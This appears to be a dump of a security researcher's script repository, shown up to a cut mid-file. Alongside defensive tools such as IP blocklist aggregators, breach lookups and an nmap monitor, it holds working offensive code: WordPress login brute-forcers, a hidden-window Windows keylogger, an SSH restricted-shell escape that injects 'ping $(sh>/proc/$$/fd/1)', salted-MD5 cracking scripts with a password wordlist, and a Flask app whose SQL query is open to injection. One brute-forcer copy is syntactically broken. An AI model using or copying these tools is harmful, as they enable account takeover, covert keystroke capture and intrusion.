about 200,000 de-duplicated bad actors from public IP blacklist for your big data infosec needs. 6 | 7 | *(ThreatCollection_Blacklisted_BigData.py takes about 20+ minutes to run. So...)* 8 | 9 | ![Alt text](https://imgs.xkcd.com/comics/compiling.png) 10 | 11 | ##Usage 12 | python ThreatCollection_Blacklisted_Small.py 13 | or 14 | python ThreatCollection_Blacklisted_BigData.py 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Threat_Blacklisted_Collection/ThreatCollection_Blacklisted_BigData.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Name: Bigdata Analytics - Threat Collection 3 | # Purpose: Creates a list of Bad Actors from IP Blacklist 4 | 5 | 6 | from contextlib import closing 7 | from urllib import urlopen 8 | import os 9 | import re 10 | import time 11 | import sys 12 | 13 | def color(text, color_code): 14 | if sys.platform == "win32" and os.getenv("TERM") != "xterm": 15 | return text 16 | 17 | return '\x1b[%dm%s\x1b[0m' % (color_code, text) 18 | 19 | 20 | def red(text): 21 | return color(text, 31) 22 | 23 | def blue(text): 24 | return color(text, 34) 25 | try: 26 | os.remove('reallybadactors.txt') 27 | except OSError: 28 | pass 29 | 30 | fo = open('badactorsunclean.txt', 'w+') 31 | 32 | print'\n' 33 | 34 | urlss = ["http://rules.emergingthreats.net/blockrules/compromised-ips.txt", 35 | "http://www.blocklist.de/lists/bruteforcelogin.txt", 36 | "http://dragonresearchgroup.org/insight/sshpwauth.txt", 37 | "http://dragonresearchgroup.org/insight/vncprobe.txt", 38 | "http://www.openbl.org/lists/base.txt", 39 | "http://www.nothink.org/blacklist/blacklist_malware_http.txt", 40 | "http://www.nothink.org/blacklist/blacklist_ssh_all.txt", 41 | "http://antispam.imp.ch/spamlist", 42 | "http://www.dshield.org/ipsascii.html?limit=10000", 43 | "http://malc0de.com/bl/IP_Blacklist.txt", 44 | "http://hosts-file.net/rss.asp", 45 | "https://feodotracker.abuse.ch/blocklist/?download=ipblocklist", 46 | "http://reputation.alienvault.com/reputation.data", 47 | "http://www.binarydefense.com/banlist.txt"] 48 | 49 | 50 | for urls in urlss: 51 | copy = urlopen(urls) 52 | ips = [] 53 | count = 0 54 | start = time.time() 55 | print ('Checking %s') % (urls) 56 | 57 | with closing(copy): 58 | for text in copy.readlines(): 59 | text = text.rstrip() 60 | regex = re.findall(r'(?:\d{1,3}\.){3}\d{1,3}', text) 61 | if regex is not None and regex not in ips: 62 | ips.append(regex) 63 | 64 | for ip in ips: 65 | ipaddress = "".join(ip) 66 | if ipaddress is not '': 67 | count = count+1 68 | #print (ipaddress) 69 | fo.write(ipaddress) 70 | fo.write("\n") 71 | fo.write("\n") 72 | end = time.time() 73 | elpased = end-start 74 | print(blue("\t\t Found %s addresses in %.2f seconds.")) %(count,elpased) 75 | 76 | fo.close() 77 | 78 | 79 | print('\nRemoving duplicates from the list!') 80 | 81 | lines_seen = set() # holds lines already seen 82 | outfile = open("reallybadactors.txt", "w+") 83 | for line in open("badactorsunclean.txt", "r"): 84 | if line not in lines_seen: # not a duplicate 85 | outfile.write(line) 86 | lines_seen.add(line) 87 | outfile.close() 88 | 89 | with open('badactorsunclean.txt') as ucips: 90 | ucbadips = sum(1 for _ in ucips) 91 | 92 | with open('reallybadactors.txt') as ips: 93 | badips = sum(1 for _ in ips) 94 | 95 | dupeips = (ucbadips-badips) 96 | 97 | print ("\nFound and removed %s duplicate IP addresses \n") %dupeips 98 | 99 | print ('The are %s bad ip addresses in reallybadactors.txt') % badips 100 | 101 | os.remove("badactorsunclean.txt") 102 | os.system("open " + "reallybadactors.txt") 103 | -------------------------------------------------------------------------------- /Threat_Blacklisted_Collection/ThreatCollection_Blacklisted_Small.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Purpose: Creates a list of BadIP Addresses 3 | 4 | 5 | from contextlib import closing 6 | from urllib import urlopen 7 | import os 8 | import re 9 | import time 10 | import sys 11 | 12 | def color(text, color_code): 13 | if sys.platform == "win32" and os.getenv("TERM") != "xterm": 14 | return text 15 | 16 | return '\x1b[%dm%s\x1b[0m' % (color_code, text) 17 | 18 | 19 | def red(text): 20 | return color(text, 31) 21 | 22 | def blue(text): 23 | return color(text, 34) 24 | try: 25 | os.remove('badactors.txt') 26 | except OSError: 27 | pass 28 | 29 | fo = open('badactorsunclean.txt', 'w+') 30 | 31 | print'\n' 32 | 33 | urlss = ["http://rules.emergingthreats.net/blockrules/compromised-ips.txt", 34 | "http://www.blocklist.de/lists/bruteforcelogin.txt", 35 | "http://dragonresearchgroup.org/insight/sshpwauth.txt", 36 | "http://dragonresearchgroup.org/insight/vncprobe.txt", 37 | "http://www.openbl.org/lists/base.txt", 38 | "http://www.nothink.org/blacklist/blacklist_malware_http.txt", 39 | "http://www.nothink.org/blacklist/blacklist_ssh_all.txt", 40 | "http://antispam.imp.ch/spamlist", 41 | "http://www.dshield.org/ipsascii.html?limit=10000", 42 | "http://malc0de.com/bl/IP_Blacklist.txt", 43 | "http://hosts-file.net/rss.asp", 44 | "https://feodotracker.abuse.ch/blocklist/?download=ipblocklist", 45 | "http://www.binarydefense.com/banlist.txt"] 46 | 47 | 48 | for urls in urlss: 49 | copy = urlopen(urls) 50 | ips = [] 51 | count = 0 52 | start = time.time() 53 | print ('Checking %s') % (urls) 54 | 55 | with closing(copy): 56 | for text in copy.readlines(): 57 | text = text.rstrip() 58 | regex = re.findall(r'(?:\d{1,3}\.){3}\d{1,3}', text) 59 | if regex is not None and regex not in ips: 60 | ips.append(regex) 61 | 62 | for ip in ips: 63 | ipaddress = "".join(ip) 64 | if ipaddress is not '': 65 | count = count+1 66 | #print (ipaddress) 67 | fo.write(ipaddress) 68 | fo.write("\n") 69 | fo.write("\n") 70 | end = time.time() 71 | elpased = end-start 72 | print(blue("\t\t Found %s addresses in %.2f seconds.")) %(count,elpased) 73 | 74 | fo.close() 75 | 76 | 77 | print('\nRemoving duplicates from the list!') 78 | 79 | lines_seen = set() # holds lines already seen 80 | outfile = open("badactors.txt", "w+") 81 | for line in open("badactorsunclean.txt", "r"): 82 | if line not in lines_seen: # not a duplicate 83 | outfile.write(line) 84 | lines_seen.add(line) 85 | outfile.close() 86 | 87 | with open('badactorsunclean.txt') as ucips: 88 | ucbadips = sum(1 for _ in ucips) 89 | 90 | with open('badactors.txt') as ips: 91 | badips = sum(1 for _ in ips) 92 | 93 | dupeips = (ucbadips-badips) 94 | 95 | print ("\nFound and removed %s duplicate IP addresses \n") %dupeips 96 | 97 | print ('The are %s bad ip addresses in badactors.txt') % badips 98 | 99 | os.remove("badactorsunclean.txt") 100 | os.system("open " + "badactors.txt") 101 | -------------------------------------------------------------------------------- /Threatfeeds-Automation/RansomePaymentGatewayfeeds/Readme.md: -------------------------------------------------------------------------------- 1 | Enumerating the .onion websites, and combine the data with Web2Tor gateways that are commonly used by 2 | malware authors, and compile a suggested notification or block list. 3 | 4 | Our goal is to combine this useful data into actionable indicators of warnings for IT/IR teams to use 5 | in their IDS or SIEM. 6 | -------------------------------------------------------------------------------- /Threatfeeds-Automation/RansomePaymentGatewayfeeds/ransomepaymentfeeds.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import requests 3 | 4 | if __name__ == '__main__': 5 | ioc = [] 6 | feed_file = requests.get('https://files.deependresearch.org/feeds/ransomware/ransomware-payment-sites.txt', verify=False).content 7 | outfile = 'domain,notes\n' 8 | for line in feed_file.splitlines(): 9 | if line.startswith('#') or '.' not in line: 10 | continue 11 | outfile += '%s,Suspected Ransomware Payment Site\n' % line 12 | with open('ransomware_payment_site.csv', 'w') as fh: 13 | fh.write(outfile) 14 | 15 | #Use in Splunk environment set a query using'inputlookup' option 16 | 17 | -------------------------------------------------------------------------------- /VirusTotal_Automation/readme.md: -------------------------------------------------------------------------------- 1 | ### VirusTotal.py ? 2 | 3 | Virustotal.py is a python script that will automatically lookup all files contained in a directory on virustotal.com 4 | 5 | # Usage 6 | 7 | python Virustotal.py ../Directory/To/Scan 8 | 9 | python Virustotal.py /media/usb/ 10 | 11 | 12 | # Notes 13 | You will need an API Key from Virustotal.com for this script to work: 14 | https://www.virustotal.com/en/documentation/public-api/ 15 | 16 | For ease of use past key into API_KEY ='' on Line11. 17 | 18 | 19 | #Important Notice 20 | *VirusTotal scanning.......!!!!* 21 | 22 | -------------------------------------------------------------------------------- /Wordpress_Bruteforce_Scripts/WordpressLoginBruteforcer/h.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import sys 4 | import argparse 5 | #test 6 | 7 | def test_login(username,url,falseValue): 8 | payload ={"log":username,"pwd":"fu"} 9 | r = requests.post(url,data=payload) 10 | m= re.search(falseValue,r.text) 11 | if m is None: 12 | if(r.status_code==404): 13 | print "Error page not found, will exit, try to put a valid url or false value" 14 | sys.exit(0) 15 | return True 16 | return False 17 | if args.url==False or args.falseValue==False: 18 | print "RTFM" 19 | sys.exit(0) 20 | 21 | 22 | file = open("dict.txt")) 23 | line = file.readline() 24 | while line: 25 | if(args.verbose): 26 | print "Trying with : %s"%(line) 27 | if(test_login(line,args.url,args.falseValue)): 28 | print "Found a valid login with : %s"%(line) 29 | sys.exit(1) 30 | else: 31 | line = file.readline() 32 | file.close() 33 | 34 | if(args.bruteforce): 35 | print "foo" 36 | 37 | -------------------------------------------------------------------------------- /Wordpress_Bruteforce_Scripts/WordpressLoginBruteforcer/script.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import sys 4 | import argparse 5 | #test 6 | 7 | def test_login(username,url,falseValue): 8 | payload ={"log":username,"pwd":"fu"} 9 | r = requests.post(url,data=payload) 10 | m= re.search(falseValue,r.text) 11 | if m is None: 12 | if(r.status_code==404): 13 | print "Error page not found, will exit, try to put a valid url or false value" 14 | sys.exit(0) 15 | return True 16 | return False 17 | 18 | parser = argparse.ArgumentParser() 19 | 20 | parser.add_argument("--url", "-u", action="store", dest="url", help="The url where you want to test the bruteforce") 21 | parser.add_argument("--false","-f",action="store", dest="falseValue", help="The string that return false when you try a random login") 22 | parser.add_argument("--wordlist","-w",action="store",dest="wordlist",help="The wordlist to do the dictionnary attack") 23 | parser.add_argument("--bruteforce","-b",action="store_true",dest="bruteforce",help="Do a pure bruteforce, if dictionnary is selected bruteforce will occur after") 24 | parser.add_argument("--all","-a",action="store_true",dest="all",help="Test all the words even if found a valid one. Default value is false the script will exit on first found") 25 | parser.add_argument("--verbose","-v",action="store_true",dest="verbose",help="Verbose mode is where I talk to you Human") 26 | 27 | args = parser.parse_args() 28 | 29 | if args.url==False or args.falseValue==False: 30 | print "RTFM" 31 | sys.exit(0) 32 | 33 | if(args.wordlist): 34 | file = open(args.wordlist) 35 | line = file.readline() 36 | while line: 37 | if(args.verbose): 38 | print "Trying with : %s"%(line) 39 | 40 | if(test_login(line,args.url,args.falseValue)): 41 | print "Found a valid login with : %s"%(line) 42 | sys.exit(1) 43 | else: 44 | line = file.readline() 45 | file.close() 46 | 47 | if(args.bruteforce): 48 | print "foo" 49 | 50 | sys.exit(0) 51 | -------------------------------------------------------------------------------- /Wordpress_Bruteforce_Scripts/WordpressPasswordBruteforcer/script.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import sys 4 | import argparse 5 | 6 | 7 | def test_login(username,password,url,falseValue): 8 | payload ={"log":username,"pwd":password} 9 | r = requests.post(url,data=payload) 10 | m= re.search(falseValue,r.text) 11 | if m is not None: 12 | if(r.status_code==404): 13 | print "Error page not found, will exit, try to put a valid url or false value" 14 | sys.exit(0) 15 | return False 16 | return True 17 | 18 | parser = argparse.ArgumentParser() 19 | 20 | parser.add_argument("--url", "-u", action="store", dest="url", help="The url where you want to test the bruteforce") 21 | parser.add_argument("--false","-f",action="store", dest="falseValue", help="The string that return false when you try a random login") 22 | parser.add_argument("--wordlist","-w",action="store",dest="wordlist",help="The wordlist to do the dictionnary attack") 23 | parser.add_argument("--bruteforce","-b",action="store_true",dest="bruteforce",help="Do a pure bruteforce, if dictionnary is selected bruteforce will occur after") 24 | parser.add_argument("--all","-a",action="store_true",dest="all",help="Test all the words even if found a valid one. Default value is false the script will exit on first found") 25 | parser.add_argument("--verbose","-v",action="store_true",dest="verbose",help="Verbose mode is where I talk to you Human") 26 | parser.add_argument("--login","-l",action="store",dest="username",help="The Username to use") 27 | 28 | 29 | args = parser.parse_args() 30 | 31 | if args.url==False or args.falseValue==False or args.username==False: 32 | print "RTFM" 33 | sys.exit(0) 34 | 35 | if(args.wordlist): 36 | file = open(args.wordlist) 37 | line = file.readline() 38 | while line: 39 | if(args.verbose): 40 | print "Trying with : %s"%(line) 41 | 42 | if(test_login(args.username,line,args.url,args.falseValue)): 43 | print "Found a valid login with : %s"%(line) 44 | sys.exit(1) 45 | else: 46 | line = file.readline() 47 | file.close() 48 | 49 | if(args.bruteforce): 50 | print "foo" 51 | 52 | sys.exit(0) 53 | -------------------------------------------------------------------------------- /email_hacked.py: -------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Independent Security Researcher" 3 | import os 4 | import json 5 | import simplejson 6 | import requests 7 | 8 | a = raw_input("Enter the email:") 9 | b = {'q':a} 10 | r = requests.get('https://hacked-emails.com/api', params=b) 11 | res = simplejson.loads(r.text) 12 | a = range(int(res['results'])) 13 | if r.status_code == 200: 14 | print "Email:" , res['query'] 15 | print "Status:" , res['status'] 16 | print "No.of.leaks:", res['results'] 17 | for i in a: 18 | print "Leaked Data : Part-",i+1 19 | print "Title of leak :" , res['data'][i]['title'] 20 | print "Author :" , res['data'][i]['author'] 21 | print "Verified leak :" , res['data'][i]['verified'] 22 | print "Date leaked :" , res['data'][i]['date_leaked'] 23 | print "Date published :" , res['data'][i]['date_created'] 24 | print "Network :" , res['data'][i]['source_network'] 25 | print "Site:" , res['data'][i]['source_provider'] 26 | print "File size :" , res['data'][i]['source_size'] % 1024 27 | print "Emails found :" , res['data'][i]['emails_count'] 28 | print "Details:" , res['data'][i]['details'] 29 | print "Source URL:" , res['data'][i]['source_url'] 30 | print "No. of lines :" , res['data'][i]['source_lines'] 31 | print "------------xxxxxxxxxxxxx----------------" 32 | # print "Leak:" , res['data'][0]['title'] 33 | # print "Source Network:", res['data'][0][''] 34 | else: 35 | print "Email:" , res['query'] 36 | print "Status:" , res['status'] 37 | 38 | -------------------------------------------------------------------------------- /escape_shell.py: -------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Independent Security Research" 3 | __program__ = "Escape Shell (RCE using --> Shell)" 4 | __payload__ = "ping $(sh>/proc/$$/fd/1)" 5 | 6 | import socket 7 | import sys 8 | import paramiko 9 | import threading 10 | 11 | lock = threading.RLock() 12 | payload = "ping $(sh>/proc/$$/fd/1) ?" 13 | session = None 14 | transport = None 15 | stopbinding = False 16 | 17 | def write(value): 18 | with lock: 19 | sys.stdout.write(value) 20 | sys.stdout.flush() 21 | 22 | def channel_intercept(): 23 | try: 24 | global stopbinding 25 | while True: 26 | if stopbinding: 27 | break 28 | data = session.recv(256) 29 | if not data: 30 | stopbinding = True 31 | transport.close() 32 | write("Press enter to exit...") 33 | break 34 | if "prctl_runCommandInShellWithTimeout" in data: 35 | transport.close() 36 | init() 37 | session.send("%s\n" % payload) 38 | channel_intercept() 39 | else: 40 | write(data) 41 | except KeyboardInterrupt: 42 | stopbinding = True 43 | transport.close() 44 | 45 | def bind_stdin(): 46 | try: 47 | global stopbinding 48 | while True: 49 | d = sys.stdin.read(1) 50 | if not d or stopbinding: 51 | break 52 | session.send(d) 53 | except KeyboardInterrupt: 54 | stopbinding = True 55 | transport.close() 56 | 57 | def init(): 58 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 59 | sock.connect(("192.168.1.1", 22)) # Any IP Address --> Login through SSH 60 | global transport 61 | transport = paramiko.Transport(sock) 62 | try: 63 | transport.start_client() 64 | except paramiko.SSHException: 65 | write("SSH negotiation failed.") 66 | sys.exit(1) 67 | 68 | if not transport.is_authenticated(): 69 | transport.auth_password("username", "password") # Give proper creds to SSH Connection 70 | if not transport.is_authenticated(): 71 | write("Authentication failed.") 72 | transport.close() 73 | sys.exit(1) 74 | 75 | global session 76 | session = transport.open_session() 77 | session.get_pty() 78 | session.invoke_shell() 79 | 80 | init() 81 | writer = threading.Thread(target=channel_intercept) 82 | writer.start() 83 | session.send("%s\n" % payload) # Execute the particular payload in remote server 84 | bind_stdin() 85 | -------------------------------------------------------------------------------- /haveibeenpwned.py: -------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Penetration Testing" 3 | 4 | import requests 5 | import json 6 | import re 7 | import simplejson 8 | a = raw_input("Enter the email:") 9 | r = requests.get("https://haveibeenpwned.com/api/v2/breachedaccount/"+a) 10 | res = json.loads(r.text) 11 | url_pattern = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' 12 | a = len(res) 13 | if r.status_code == 200: 14 | print "Email:" , a 15 | for i in res: 16 | print "Domain:" , i['Domain'] 17 | print "Leakedaccounts:" , i['PwnCount'] 18 | print "Domain:", i['Domain'] 19 | print "BreachDate:", i['BreachDate'] 20 | print "AddedDate:", i['AddedDate'] 21 | links = i['Description'] 22 | find_links = re.findall(url_pattern, links) 23 | print "Links:", "\n".join([str(x) for x in find_links]) 24 | -------------------------------------------------------------------------------- /keylogger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | __author__ = "Santhosh Baswa" 3 | __copyright__ = "Copyright 2016, Independent Security Research" 4 | 5 | import win32console 6 | import win32gui 7 | import pythoncom 8 | import pyHook 9 | 10 | win=win32console.GetConsoleWindow() 11 | win32gui.ShowWindow(win,0) 12 | 13 | def OnKeyboardEvent(event): 14 | if event.Ascii==5: 15 | _exit(1) 16 | if event.Ascii !=0 or 8: 17 | f=open('C:\Users\Santhosh\Downloads\output.txt','r+') 18 | buffer=f.read() 19 | f.close() 20 | f=open('C:\Users\Santhosh\Downloads\output.txt','w') 21 | keylogs=chr(event.Ascii) 22 | if event.Ascii==13: 23 | keylogs='/n' 24 | buffer+=keylogs 25 | f.write(buffer) 26 | f.close() 27 | f1 = open('C:\Users\Santhosh\Downloads\output.txt', 'w') 28 | f1.write('Incoming keys:\n') 29 | f1.close() 30 | hm=pyHook.HookManager() 31 | hm.KeyDown=OnKeyboardEvent 32 | hm.HookKeyboard() 33 | pythoncom.PumpMessages() 34 | -------------------------------------------------------------------------------- /linkden-company_employee-enumeration/README.md: -------------------------------------------------------------------------------- 1 | linkden_company_employee_enumeration 2 | ===================== 3 | Give it a company id, and it will try to get all employees associated with the company. 4 | -------------------------------------------------------------------------------- /md5_crack_challenge/fuck.py: -------------------------------------------------------------------------------- 1 | import md5 2 | import hashlib 3 | import os 4 | salt = 'shishaclub' 5 | md5_salt = md5.new(salt).hexdigest() 6 | 7 | with open('wordlist.txt','rb') as f: 8 | for password in f: 9 | md5_pass = md5.new(password).hexdigest() 10 | s = str(salt+password.strip()) 11 | s1 = str(password.strip()+salt) 12 | print(s+"="+md5.new(s).hexdigest()) 13 | print(s1+"="+md5.new(s1).hexdigest()) 14 | # print(md5.new(md5_salt+md5_pass).hexdigest()) 15 | -------------------------------------------------------------------------------- /md5_crack_challenge/h.py: -------------------------------------------------------------------------------- 1 | import crypt 2 | salt = 'shishaclub' 3 | with open('wordlist.txt','rb') as f: 4 | for password in f: 5 | print(crypt.crypt(password.strip(),salt)) 6 | -------------------------------------------------------------------------------- /md5_crack_challenge/wordlist.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | 12345 3 | 123456789 4 | password 5 | iloveyou 6 | princess 7 | 1234567 8 | rockyou 9 | 12345678 10 | abc123 11 | nicole 12 | daniel 13 | babygirl 14 | monkey 15 | lovely 16 | jessica 17 | 654321 18 | michael 19 | ashley 20 | qwerty 21 | 111111 22 | iloveu 23 | 000000 24 | michelle 25 | tigger 26 | sunshine 27 | chocolate 28 | password1 29 | soccer 30 | anthony 31 | friends 32 | butterfly 33 | purple 34 | angel 35 | jordan 36 | liverpool 37 | justin 38 | loveme 39 | fuckyou 40 | 123123 41 | football 42 | secret 43 | andrea 44 | carlos 45 | jennifer 46 | joshua 47 | bubbles 48 | 1234567890 49 | superman 50 | hannah 51 | amanda 52 | loveyou 53 | pretty 54 | basketball 55 | andrew 56 | angels 57 | tweety 58 | flower 59 | playboy 60 | hello 61 | elizabeth 62 | hottie 63 | tinkerbell 64 | charlie 65 | samantha 66 | barbie 67 | chelsea 68 | lovers 69 | teamo 70 | jasmine 71 | brandon 72 | 666666 73 | shadow 74 | melissa 75 | eminem 76 | matthew 77 | robert 78 | danielle 79 | forever 80 | family 81 | jonathan 82 | 987654321 83 | computer 84 | whatever 85 | dragon 86 | vanessa 87 | cookie 88 | naruto 89 | summer 90 | sweety 91 | spongebob 92 | joseph 93 | junior 94 | softball 95 | taylor 96 | yellow 97 | daniela 98 | lauren 99 | mickey 100 | princesa 101 | alexandra 102 | alexis 103 | jesus 104 | estrella 105 | miguel 106 | william 107 | thomas 108 | beautiful 109 | mylove 110 | angela 111 | poohbear 112 | patrick 113 | iloveme 114 | sakura 115 | adrian 116 | alexander 117 | destiny 118 | christian 119 | 121212 120 | sayang 121 | america 122 | dancer 123 | monica 124 | richard 125 | 112233 126 | princess1 127 | 555555 128 | diamond 129 | carolina 130 | steven 131 | rangers 132 | louise 133 | orange 134 | 789456 135 | 999999 136 | shorty 137 | 11111 138 | nathan 139 | snoopy 140 | gabriel 141 | hunter 142 | cherry 143 | killer 144 | sandra 145 | alejandro 146 | buster 147 | george 148 | brittany 149 | alejandra 150 | patricia 151 | rachel 152 | tequiero 153 | 7777777 154 | cheese 155 | 159753 156 | arsenal 157 | dolphin 158 | antonio 159 | heather 160 | david 161 | ginger 162 | stephanie 163 | peanut 164 | blink182 165 | sweetie 166 | 222222 167 | beauty 168 | 987654 169 | victoria 170 | honey 171 | 00000 172 | fernando 173 | pokemon 174 | maggie 175 | corazon 176 | chicken 177 | pepper 178 | cristina 179 | rainbow 180 | kisses 181 | manuel 182 | myspace 183 | rebelde 184 | angel1 185 | ricardo 186 | babygurl 187 | heaven 188 | 55555 189 | baseball 190 | martin 191 | greenday 192 | november 193 | alyssa 194 | madison 195 | mother 196 | 123321 197 | 123abc 198 | mahalkita 199 | batman 200 | september 201 | december 202 | morgan 203 | mariposa 204 | maria 205 | gabriela 206 | iloveyou2 207 | bailey 208 | jeremy 209 | pamela 210 | kimberly 211 | gemini 212 | shannon 213 | pictures 214 | asshole 215 | sophie 216 | jessie 217 | hellokitty 218 | claudia 219 | babygirl1 220 | angelica 221 | austin 222 | mahalko 223 | victor 224 | horses 225 | tiffany 226 | mariana 227 | eduardo 228 | andres 229 | courtney 230 | booboo 231 | kissme 232 | harley 233 | ronaldo 234 | iloveyou1 235 | precious 236 | october 237 | inuyasha 238 | peaches 239 | veronica 240 | chris 241 | 888888 242 | adriana 243 | cutie 244 | james 245 | banana 246 | prince 247 | friend 248 | jesus1 249 | crystal 250 | celtic 251 | -------------------------------------------------------------------------------- /nmapslackscan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash -u 2 | # 3 | # Tools: NMAP, NDIFF, PRIPS and Slackcli 4 | # SLACKTOKEN from here https://api.slack.com/web 5 | # PRIPS : Parellel processing 6 | # NDIFF latest version 7 | 8 | 9 | NETWORKS="192.168.0.0/24" 10 | TARGETS=$(for NETWORK in ${NETWORKS}; do prips $NETWORK; done) 11 | INTERVAL="1800" 12 | SLACKTOKEN="Get This From https://api.slack.com/web" 13 | OPTIONS='-T4 --open --exclude-ports 25' 14 | 15 | 16 | cd ~/scan 17 | LAST_RUN_FILE='.lastrun' 18 | 19 | while true; do 20 | 21 | # If the last run file exists, we should only sleep for the time 22 | # specified minus the time that's already elapsed. 23 | if [ -e "${LAST_RUN_FILE}" ]; then 24 | LAST_RUN_TS=$(date -r ${LAST_RUN_FILE} +%s) 25 | NOW_TS=$(date +%s) 26 | LAST_RUN_SECS=$(expr ${NOW_TS} - ${LAST_RUN_TS}) 27 | SLEEP=$(expr ${INTERVAL} - ${LAST_RUN_SECS}) 28 | if [ ${SLEEP} -gt 0 ]; then 29 | UNTIL_SECS=$(expr ${NOW_TS} + ${SLEEP}) 30 | echo $(date) "- sleeping until" $(date --date="@${UNTIL_SECS}") "(${SLEEP}) seconds" 31 | sleep ${SLEEP} 32 | fi 33 | fi 34 | 35 | START_TIME=$(date +%s) 36 | echo '' 37 | echo '==================' 38 | echo '' 39 | 40 | 41 | DATE=`date +%Y-%m-%d_%H-%M-%S` 42 | for TARGET in ${TARGETS}; do 43 | CUR_LOG=scan-${TARGET/\//-}-${DATE} 44 | PREV_LOG=scan-${TARGET/\//-}-prev 45 | DIFF_LOG=scan-${TARGET/\//-}-diff 46 | 47 | echo '' 48 | echo $(date) "- starting ${TARGET}" 49 | 50 | 51 | # Scan the target 52 | nmap ${OPTIONS} ${TARGET} -oX ${CUR_LOG} >/dev/null 53 | 54 | # If there's a previous log, diff it 55 | if [ -e ${PREV_LOG} ]; then 56 | 57 | # Exclude the Nmap version and current date - the date always changes 58 | ndiff ${PREV_LOG} ${CUR_LOG} | egrep -v '^(\+|-)N' > ${DIFF_LOG} 59 | if [ -s ${DIFF_LOG} ]; then 60 | printf "Changes Detected, Sending to Slack." 61 | nmap -sV ${TARGET} | grep open | grep -v "#" > openports.txt 62 | slackcli -t $SLACKTOKEN -h nmap -m "Changes were detected on ${TARGET}. The following ports are now open: " 63 | sleep 1 64 | cat openports.txt | slackcli -t $SLACKTOKEN -h nmap -c 65 | rm openports.txt 66 | # Set the current nmap log file to reflect the last date changed 67 | ln -sf ${CUR_LOG} ${PREV_LOG} 68 | else 69 | # No changes so remove our current log 70 | printf "No Changes Detected." 71 | rm ${CUR_LOG} 72 | fi 73 | rm ${DIFF_LOG} 74 | else 75 | # Create the previous scan log 76 | ln -sf ${CUR_LOG} ${PREV_LOG} 77 | fi 78 | done 79 | 80 | touch ${LAST_RUN_FILE} 81 | END_TIME=$(date +%s) 82 | echo 83 | echo $(date) "- finished all targets in" $(expr ${END_TIME} - ${START_TIME}) "second(s)" 84 | done -------------------------------------------------------------------------------- /salaries-flask-app/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request 2 | from flask_restful import Resource, Api 3 | from sqlalchemy import create_engine 4 | from json import dumps 5 | 6 | e = create_engine('sqlite:///salaries.db') 7 | app = Flask(__name__) 8 | api = Api(app) 9 | 10 | class Dept_Meta(Resource): 11 | def get(self): 12 | conn = e.connect() 13 | query = conn.execute("select distinct DEPARTMENT from salaries") 14 | return {'departments': [i[0] for i in query.cursor.fetchall()]} 15 | 16 | class Dept_Salary(Resource): 17 | def get(self, department_name): 18 | conn = e.connect() 19 | query = conn.execute("select * from salaries where Department='%s'"%department_name.upper()) 20 | result = {'data': [dict(zip(tuple (query.keys()),i)) for i in query.cursor]} 21 | return result 22 | 23 | api.add_resource(Dept_Salary,'/dept/') 24 | api.add_resource(Dept_Meta,'/departments') 25 | 26 | if __name__ == '__main__': 27 | app.run() 28 | -------------------------------------------------------------------------------- /salaries-flask-app/salaries.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/salaries-flask-app/salaries.db -------------------------------------------------------------------------------- /shodan_ip_download.py: -------------------------------------------------------------------------------- 1 | from shodan import Shodan 2 | from shodan.helpers import open_file, write_banner 3 | from shodan.cli.helpers import get_api_key 4 | from sys import argv, exit 5 | 6 | # Validation 7 | if len(argv) != 3: 8 | print('Usage: {} '.format(argv[0])) 9 | print('Example: {} grizzly-ips.txt shodan-grizzly.json.gz'.format(argv[0])) 10 | exit(1) 11 | 12 | input_filename = argv[1] 13 | output_filename = argv[2] 14 | 15 | # Must have initialized the CLI before running this script 16 | key = get_api_key() 17 | 18 | api = Shodan(key) 19 | 20 | #Output file 21 | fout = open_file(output_filename, 'w') 22 | 23 | # Open the file containing the list of IPs 24 | with open(input_filename, 'r') as fin: 25 | # Loop over all the IPs in the file 26 | for line in fin: 27 | ip = line.strip() # Remove any trailing whitespace/ newlines 28 | 29 | # Wrap the API calls to nicely skip IPs which don't have data 30 | try: 31 | print('Processing: {}'.format(ip)) 32 | info = api.host(ip) 33 | 34 | # All the banners are stored in the "data" property 35 | for banner in info['data']: 36 | write_banner(fout, banner) 37 | except: 38 | pass # No data 39 | 40 | -------------------------------------------------------------------------------- /sslcert_verification.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import sys 4 | 5 | if len(sys.argv) < 2: 6 | print "Usage: %s hostname1 [hostname2] [hostname3] ..." % sys.argv[0] 7 | print 8 | print "Preparation:" 9 | print " $ virtualenv venv" 10 | print " $ . venv/bin/activate" 11 | print " $ pip install pytz pyasn1 pyOpenSSL ndg-httpsclient" 12 | 13 | import ssl 14 | from datetime import datetime 15 | import pytz 16 | import OpenSSL 17 | import socket 18 | 19 | 20 | from ndg.httpsclient.subj_alt_name import SubjectAltName 21 | from pyasn1.codec.der import decoder as der_decoder 22 | import pyasn1 23 | 24 | def get_subj_alt_name(peer_cert): 25 | dns_name = [] 26 | general_names = SubjectAltName() 27 | for i in range(peer_cert.get_extension_count()): 28 | ext = peer_cert.get_extension(i) 29 | ext_name = ext.get_short_name() 30 | if ext_name == "subjectAltName": 31 | ext_dat = ext.get_data() 32 | decoded_dat = der_decoder.decode(ext_dat, asn1Spec=general_names) 33 | 34 | for name in decoded_dat: 35 | if isinstance(name, SubjectAltName): 36 | for entry in range(len(name)): 37 | component = name.getComponentByPosition(entry) 